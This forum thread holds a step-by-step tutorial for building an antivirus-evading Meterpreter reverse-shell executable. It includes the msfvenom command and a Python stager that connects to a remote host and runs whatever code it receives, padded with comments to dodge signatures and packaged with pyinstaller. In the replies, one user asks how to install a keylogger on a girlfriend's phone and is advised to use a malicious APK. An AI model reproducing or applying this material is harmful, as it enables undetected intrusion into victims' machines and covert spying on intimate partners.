Forum Thread: Creating an Completely Undetectable Executable in Under 15 Minutes!

Hello everyone, this is my first post so play nice with me.
We are going to create an undetectable (meterpreter/shell/vnc) executable in under 15 minutes.

Hence forth, what I mean by undetectable is that it is undetected by 0 antivirus. Trust me I 've tried and it's possible.

But you ask, how is this possible?
Let me explain how AV's detect threats in quick and simple language.

When you scan an .exe or any other file, it doesn't scan the actual code for bad stuff. It copies the signature and searches it's database if it's a threat or not. Simple.

Typically many new executables aren't detected until it's too late.

So, how do we change the signature, how we infect the user?
Let's do this!

Note: All tools used were used under a fresh kali system. Meaning that all tools are already preinstalled.

Step 1: Boot Up Kali and Create a Basic Executable

First we need to create a basic script from msfvenom to make the executable.
Do the command:

msfvenom -p python/meterpreter/reverse-underscore-tcp LHOST = ANYIP LPORT= ANY PORT R> anyname.py

Here is mine.

Step 2: Decrypting and Editing the Source Code

Take the .py file you've created and open it with any text editor. It should look like this.

Now we need to decrypt it with a base64 decryptor.
Take the highlighted pink part and copy it.
Paste it to any decryptor online. I used this website
Click on decode and paste it into the text box.

and look at that! We've decrypted the source code.
Naturally this code is public knowledge and all AV's know about it. So let's change the code a bit.
Copy the Source Code and paste it into encoder.

Make some spaces between the code and add
# Anything can go here
make as much as you can. The more, the better.
Here's what I did.

#True
import socket,struct
#DANK
s=socket.socket(2,socket.SOCK_STREAM)
#WOW
s.connect(('192.168.0.1',3333))
#YOU HAD ONE JOB
l=struct.unpack('>I',s.recv(4))0
#NICE AV
d=s.recv(l)
#LOL NEVER MIND
while len(d)<l:
d+=s.recv(l-len(d))
#WHOA
exec(d,{'s':s})

— See?

As you can see there there is some random messages that are placed in between the code. The # means comment so it doesn't affect the code and python will just skip it. This is for human codeproofers to see what's going on.

Now. Once that's finished. Copy that code and paste it into the encoder.

That's a lot of symbols.
Copy the output and paste into the pink part of the python script you opened earlier.

As you can see, it dramatically increased the size of the code.
Save it now.

Step 3: Convert It into an Executable EXE's.

Now, unless you are attacking a Windows based client there is no need for this.
Linux is built-in python support. (At least to some extent)
Mac has built-in python support.

Windows doesn't, and the average consumer doesn't install python on their computer. So what do we do?
Make it into an .exe executable

Run the command:
pyinstaller 'Your .py file here'
thats it!
Wait for it finish.
Once it's finished it will place it in a specific directory.
Usually it's in /root/dist/nameofyourfile/.

Step 4: Testing the Executable Against the AV.

Naturally this isn't a good idea because many AV's use virustotal to see new viruses.
But it is perfect because a computer can never outsmart a always changing virus.

So take your .exe file and scan it!

As you can see we have a 0/54 detection ratio. Meaning no one found it!
This has many uses. The scenarios are endless.

GL, HF!

17 Responses

Nice tutorial. I'll be checking it out tonight. Thanks.

I'm having an issue with it. When I try to run it on Windows 7 64 bit, I get an error message of The version of this file is not compatible with the version of Windows...

I'm guessing that it's because it's a 32bit exe on a 64 bit OS, but shouldn't pyinstaller make it compatible?

It still won't work, even if I do not change anything in the source code.

Any ideas on getting it to work?

Hmm.
Okay. It's a 64 bit os. So it should be able to work.
There are other python to exe programs.
Try to use py2exe.

i got the same issue how did u manage it?

Haven't figured it out yet. I pretty much gave up. I'd rather work with Shellter.

i just learned about shellter but i am afraid that it will get cought by AV soon like veil evasion . i used to use aes encryption now anti viruses detects it. btw i have a question shellter doeesnt seem to start with full permission even though i am root in each step it says access denied rmem_error . i am using kali

Nice tutorial, it´s working well, now I know an easy way to make my files fud!

Yeah, I'm thinking about making a tool like veil-evasion.
Hows that sound?

This is a great tutorial! Why don't AVs scan the actual code?

That will be unpractical, slow and almost impossible.
Most executables are encrypted to protect people copying and pasting it.

AV's don't have a human brain, meaning that they can't scan code and say 'Wait, the code looks really sketchy. I'm removing it.'

But where AV's shine is the removal process. Once the AV finds it, your probably dead meat, I've had scenarios where Malwarebytes caught me but I killed it just in time.

Anyway, most users don't need an anti-virus, just don't install sketchy programs.

It's not entirely true that AVs don't scan the code. Signature analysis does static code analysis using extracted code patterns from previously analyzed malicious files. If a specific code pattern is found within a file, the AV will start flagging it and may potentially be seen as suspicious. If enough flags are raised, the file in question will be labelled as malicious depending on the level of sensitivity set in the AV. So in a sense, you could say that an AV knows whether a file is suspicious or not.

P.S. Is your file supposed to be a PE file? It's seen as an ELF64 on the Virus Total scan.

Personally I would disagree with your last statement. Drive by downloading malware attacks are increasing. They infect though vulnerabilities. But yeah, the majority of infections are user installed.

It doesn't matter. Drive-by vulnerabilities are still being added or not at all into AV databases.

Many AV's don't even fix or monitor vulnerabilities. That relies upon on the user downloading OS security updates. Users that use windows 10 are naturally unaffected to these, but anyone that uses anything else is affected.

Can you please help me install keylogger remotely on my girlfriend's phone??

Meterpreter for Android doesn't have a built-in keylogger.
However, you may create a malicious (.apk if android), to piggyback and install a more capable spying program.

IMO, keylogging isn't really all that useful, I personally use it to gain passwords if they are text based. Otherwise you are just flooding every letter she types.

Share Your Thoughts

  • Hot
  • Active